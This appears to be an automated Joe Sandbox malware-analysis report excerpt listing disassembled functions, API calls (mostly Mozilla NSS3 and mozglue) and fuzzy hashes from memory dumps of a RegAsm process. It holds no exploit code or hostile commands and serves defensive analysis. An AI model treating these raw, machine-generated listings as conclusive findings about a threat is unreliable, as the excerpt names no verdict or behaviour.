free.MOZGLUE(?), ref: 6CE510B4
PR_DestroyCondVar.NSS3(?), ref: 6CE510BF
PR_DestroyCondVar.NSS3(?), ref: 6CE510CA
PR_DestroyCondVar.NSS3(?), ref: 6CE510D5
PR_DestroyCondVar.NSS3(?), ref: 6CE510E0
PR_DestroyLock.NSS3(?), ref: 6CE510EB
free.MOZGLUE(?), ref: 6CE51105

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: 8b4258ee382ceffc0a347e343ae22b69148ccfe718c7f47b63f87575abe0573f
Instruction ID: f6dd65578847ad096dd61a30966577a5d16d70a636dc36050b0bedaedf24f507
Opcode Fuzzy Hash: 8b4258ee382ceffc0a347e343ae22b69148ccfe718c7f47b63f87575abe0573f
Instruction Fuzzy Hash: 6C318BB5A00501ABD702AF54FD41A85BB72BF4531CB684135E80946FB1E732F978DBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6CD8EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6CD8EE0B

Part of subcall function 6CDA0BE0: malloc.MOZGLUE(6CD98D2D,?,00000000,?), ref: 6CDA0BF8
Part of subcall function 6CDA0BE0: TlsGetValue.KERNEL32(6CD98D2D,?,00000000,?), ref: 6CDA0C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CD8EEE1

Part of subcall function 6CD81D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CD81D7E
Part of subcall function 6CD81D50: EnterCriticalSection.KERNEL32(?), ref: 6CD81D8E
Part of subcall function 6CD81D50: PR_Unlock.NSS3(?), ref: 6CD81DD3

TlsGetValue.KERNEL32 ref: 6CD8EE51
EnterCriticalSection.KERNEL32(?), ref: 6CD8EE65
PR_Unlock.NSS3(?), ref: 6CD8EEA2
free.MOZGLUE(?), ref: 6CD8EEBB
PR_SetError.NSS3(00000000,00000000), ref: 6CD8EED0
PR_Unlock.NSS3(?), ref: 6CD8EF48
free.MOZGLUE(?), ref: 6CD8EF68
PR_SetError.NSS3(00000000,00000000), ref: 6CD8EF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6CD8EFA4
free.MOZGLUE(?), ref: 6CD8EFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CD8F055
free.MOZGLUE(?), ref: 6CD8F060

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: 8737f6422a7db05dc0ad49ae75adcaf93f4f94d163e41fb41ea381b1f027d827
Instruction ID: 11843388a100674e68ee0afe195b9ea20b121c36a2667b13ac69d505b97b292b
Opcode Fuzzy Hash: 8737f6422a7db05dc0ad49ae75adcaf93f4f94d163e41fb41ea381b1f027d827
Instruction Fuzzy Hash: 2F8182B5A01209AFDF01DFA5DC85BDEBBB5BF48318F140024E919A7B21E731E914CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD54CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6CD54D80
PORT_Alloc_Util.NSS3(00000000), ref: 6CD54D95
PORT_NewArena_Util.NSS3(00000800), ref: 6CD54DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CD54E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6CD54E43
PORT_NewArena_Util.NSS3(00000800), ref: 6CD54E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CD54E85
DER_Encode_Util.NSS3(?,?,6CEA05A4,00000000), ref: 6CD54EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CD54F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CD54F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CD54F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CD54F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CD54F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CD54FC8

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 27d4ce89d92c5ca1ac9ac644dbf90a27116c0e0874f5916fb636a9c18c0d66c4
Instruction ID: c4cc6b90bc44d356162e1c33f2a20626a3eb787c55a2270cfaeb94dd2376a81b
Opcode Fuzzy Hash: 27d4ce89d92c5ca1ac9ac644dbf90a27116c0e0874f5916fb636a9c18c0d66c4
Instruction Fuzzy Hash: 4D81C471A08301EFEB01CF28D840B5BB7E4AB85358F54852DF999DB660E731E925CB93

Uniqueness

Uniqueness Score: -1.00%

Function 6CC1D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CC1D4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC1D4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC1D52A
GetCurrentThreadId.KERNEL32 ref: 6CC1D530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC1D53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC1D55F
free.MOZGLUE(00000000), ref: 6CC1D585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CC1D5D3
GetCurrentThreadId.KERNEL32 ref: 6CC1D5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC1D605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC1D652
GetCurrentThreadId.KERNEL32 ref: 6CC1D658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC1D667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC1D6A2

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 14d671bfc63f099d521ab11118ff313e3d3c65a541fec54c831993e2120d33a5
Instruction ID: a0951ec4e5944b1ec0c3edb3d5920b5e5a5c88d67aba0a1a3bee0027a7c5b2cb
Opcode Fuzzy Hash: 14d671bfc63f099d521ab11118ff313e3d3c65a541fec54c831993e2120d33a5
Instruction Fuzzy Hash: 75516BB1604B05DFC704DF35C494A9ABBB4FF89318F108A6EE85A87B11EB30A945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CD7ADC0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6CD7ADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CD7AE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CD7AE29

Part of subcall function 6CE5D930: PL_strncpyz.NSS3(?,?,?), ref: 6CE5D963

PR_LogPrint.NSS3(?,00000000), ref: 6CD7AE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CD7AE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CD7AE8A
PR_LogPrint.NSS3(?,00000000), ref: 6CD7AEA0

Strings

(CK_INVALID_HANDLE), xrefs: 6CD7AE1F, 6CD7AE80
hSession = 0x%x, xrefs: 6CD7AE01, 6CD7AE11
hKey = 0x%x, xrefs: 6CD7AE62, 6CD7AE72
C_MessageSignInit, xrefs: 6CD7ADE1
nl, xrefs: 6CD7AEB8, 6CD7AEE6

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit$nl
API String ID: 332880674-385009046
Opcode ID: 5ce7d8bbaca072d40a40b69c91f9ec9f074b87a017168e81bcd6b5af13fcc407
Instruction ID: 6754f4636971beb9bc737daba8c77b89cafa8e5413da2b7440d64290afa91249
Opcode Fuzzy Hash: 5ce7d8bbaca072d40a40b69c91f9ec9f074b87a017168e81bcd6b5af13fcc407
Instruction Fuzzy Hash: 6A31F776B00104AFCB119B55EC88BAF37B5AB56309F545029F80D67A21D730D908CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 6CD76EF0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6CD76F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CD76F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CD76F53

Part of subcall function 6CE5D930: PL_strncpyz.NSS3(?,?,?), ref: 6CE5D963

PR_LogPrint.NSS3(?,00000000), ref: 6CD76F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CD76F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6CD76FA1

Strings

(CK_INVALID_HANDLE), xrefs: 6CD76F4C
hSession = 0x%x, xrefs: 6CD76F2E, 6CD76F3E
C_DigestUpdate, xrefs: 6CD76F11
pPart = 0x%p, xrefs: 6CD76F83
ulPartLen = %d, xrefs: 6CD76F9C
nl, xrefs: 6CD76FB9, 6CD76FE7

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate$nl
API String ID: 1003633598-155936641
Opcode ID: ab72459032e7f7e4aa79b08a22f069a3c83bac33b7db745d2ec0622720d39fe3
Instruction ID: b7342220250c9ce9d4879e85b8a75c823ae2f3f12b6dcd73f95eb3b45f4b4bc6
Opcode Fuzzy Hash: ab72459032e7f7e4aa79b08a22f069a3c83bac33b7db745d2ec0622720d39fe3
Instruction Fuzzy Hash: BD31F576A11110AFDB118B65EC48B8E77B5EB9231CF544068F80DA7A21EB30D949CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD72DD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6CD72DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CD72E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CD72E33

Part of subcall function 6CE5D930: PL_strncpyz.NSS3(?,?,?), ref: 6CE5D963

PR_LogPrint.NSS3(?,00000000), ref: 6CD72E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CD72E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CD72E81

Strings

(CK_INVALID_HANDLE), xrefs: 6CD72E2C
hSession = 0x%x, xrefs: 6CD72E0E, 6CD72E1E
ulPinLen = %d, xrefs: 6CD72E7C
nl, xrefs: 6CD72E99, 6CD72EC4
pPin = 0x%p, xrefs: 6CD72E63
C_InitPIN, xrefs: 6CD72DF1

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN$nl
API String ID: 1003633598-31533058
Opcode ID: b984f0e31a5ee1250d7b1dcdc0fa14cf77ae9177bc1b5691e22eab84cad4e86a
Instruction ID: 668833f80262858045e1958f92b5f567b96c16ae9efaf7c3a98f8bfe47b356db
Opcode Fuzzy Hash: b984f0e31a5ee1250d7b1dcdc0fa14cf77ae9177bc1b5691e22eab84cad4e86a
Instruction Fuzzy Hash: 1431F576A01194EFDB109B56ED8CB8E37B5EB5231CF544025F80DA7A21DB30D948CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 6CD86C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CD8781D,00000000,6CD7BE2C,?,6CD86B1D,?,?,?,?,00000000,00000000,6CD8781D), ref: 6CD86C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CD8781D,?,6CD7BE2C,?), ref: 6CD86C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CD8781D), ref: 6CD86C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CD86C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CD86C96

Part of subcall function 6CD31240: TlsGetValue.KERNEL32(00000040,?,6CD3116C,NSPR_LOG_MODULES), ref: 6CD31267
Part of subcall function 6CD31240: EnterCriticalSection.KERNEL32(?,?,?,6CD3116C,NSPR_LOG_MODULES), ref: 6CD3127C
Part of subcall function 6CD31240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CD3116C,NSPR_LOG_MODULES), ref: 6CD31291
Part of subcall function 6CD31240: PR_Unlock.NSS3(?,?,?,?,6CD3116C,NSPR_LOG_MODULES), ref: 6CD312A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CD86CAA

Strings

extern:, xrefs: 6CD86C7E
sql:, xrefs: 6CD86C52
rdb:, xrefs: 6CD86C69
dbm:, xrefs: 6CD86C3A
dbm, xrefs: 6CD86CA4
NSS_DEFAULT_DB_TYPE, xrefs: 6CD86C91

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 22a10cbf2782edf4eb1c1720feb1a9c49c4ed2bb7d5c4c8574afb864dddc8641
Instruction ID: ea9a8d9601ed2eeac81149dc92c0a02bd0a4a468d4365f90b37639f6f952b125
Opcode Fuzzy Hash: 22a10cbf2782edf4eb1c1720feb1a9c49c4ed2bb7d5c4c8574afb864dddc8641
Instruction Fuzzy Hash: 6C01A2A170331167EA102B7A5D4AF2A396C9F41169F250432FF09E1981EFA7E92580B9

Uniqueness

Uniqueness Score: -1.00%

Function 6CD94E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6CD578F8), ref: 6CD94E6D

Part of subcall function 6CD309E0: TlsGetValue.KERNEL32(00000000,?,?,?,6CD306A2,00000000,?), ref: 6CD309F8
Part of subcall function 6CD309E0: malloc.MOZGLUE(0000001F), ref: 6CD30A18
Part of subcall function 6CD309E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6CD30A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6CD578F8), ref: 6CD94ED9

Part of subcall function 6CD85920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6CD87703,?,00000000,00000000), ref: 6CD85942
Part of subcall function 6CD85920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CD87703), ref: 6CD85954
Part of subcall function 6CD85920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CD8596A
Part of subcall function 6CD85920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CD85984
Part of subcall function 6CD85920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6CD85999
Part of subcall function 6CD85920: free.MOZGLUE(00000000), ref: 6CD859BA
Part of subcall function 6CD85920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6CD859D3
Part of subcall function 6CD85920: free.MOZGLUE(00000000), ref: 6CD859F5
Part of subcall function 6CD85920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6CD85A0A
Part of subcall function 6CD85920: free.MOZGLUE(00000000), ref: 6CD85A2E
Part of subcall function 6CD85920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6CD85A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6CD578F8), ref: 6CD94EB3

Part of subcall function 6CD94820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CD94EB8,?,?,?,?,?,?,?,?,?,?,6CD578F8), ref: 6CD9484C
Part of subcall function 6CD94820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CD94EB8,?,?,?,?,?,?,?,?,?,?,6CD578F8), ref: 6CD9486D
Part of subcall function 6CD94820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6CD94EB8,?), ref: 6CD94884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CD578F8), ref: 6CD94EC0

Part of subcall function 6CD94470: TlsGetValue.KERNEL32(00000000,?,6CD57296,00000000), ref: 6CD94487
Part of subcall function 6CD94470: EnterCriticalSection.KERNEL32(?,?,?,6CD57296,00000000), ref: 6CD944A0
Part of subcall function 6CD94470: PR_Unlock.NSS3(?,?,?,?,6CD57296,00000000), ref: 6CD944BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CD578F8), ref: 6CD94F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CD578F8), ref: 6CD94F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CD578F8), ref: 6CD94F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CD578F8), ref: 6CD94F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6CD578F8), ref: 6CD94F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CD578F8), ref: 6CD94F8F
PK11_UpdateSlotAttribute.NSS3(?,6CE6DCB0,00000000), ref: 6CD94FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6CD9501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6CD578F8), ref: 6CD9506B

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: 8f1a563dec02deb642caba12a3fc35308baf84ab4609909f350f788a96651272
Instruction ID: 35109ff33429f4f061dfd282e11c54de21fc7b6a8494dafc01023c995f6d3025
Opcode Fuzzy Hash: 8f1a563dec02deb642caba12a3fc35308baf84ab4609909f350f788a96651272
Instruction Fuzzy Hash: 215105B9900206DFEB01AF64EC01A9B76B4FF0535DF140635EC1A97A22F731D515C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6CD3ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CD3ACE2
malloc.MOZGLUE(00000001), ref: 6CD3ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CD3AD02
TlsGetValue.KERNEL32 ref: 6CD3AD3C
calloc.MOZGLUE(00000001,?), ref: 6CD3AD8C
PR_Unlock.NSS3 ref: 6CD3ADC0
free.MOZGLUE(00000000), ref: 6CD3AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CD3AE58
free.MOZGLUE(00000000), ref: 6CD3AE69
free.MOZGLUE(?), ref: 6CD3AE78
PR_Unlock.NSS3 ref: 6CD3AE8C
free.MOZGLUE(?), ref: 6CD3AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CD3AEC7

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 9c24374735d792eef8d96ebc98cb8913a8fa48bd3944509ef9caa6e0c793eee5
Instruction ID: 858f89ffdbb621f1e9ce907d085354a4bd8b78be51b1ba5c79a9462612af01c8
Opcode Fuzzy Hash: 9c24374735d792eef8d96ebc98cb8913a8fa48bd3944509ef9caa6e0c793eee5
Instruction Fuzzy Hash: 5E518CB5B01225CFDF01AFD8E8416AEB774AB47349F140026D81DA7A60E371E954CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6CBE5670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6CBE56D1
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CBE56E9
?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6CBE56F1
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6CBE5744
??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6CBE57BC
GetTickCount64.KERNEL32 ref: 6CBE58CB
EnterCriticalSection.KERNEL32(6CC4F688), ref: 6CBE58F3
__aulldiv.LIBCMT ref: 6CBE5945
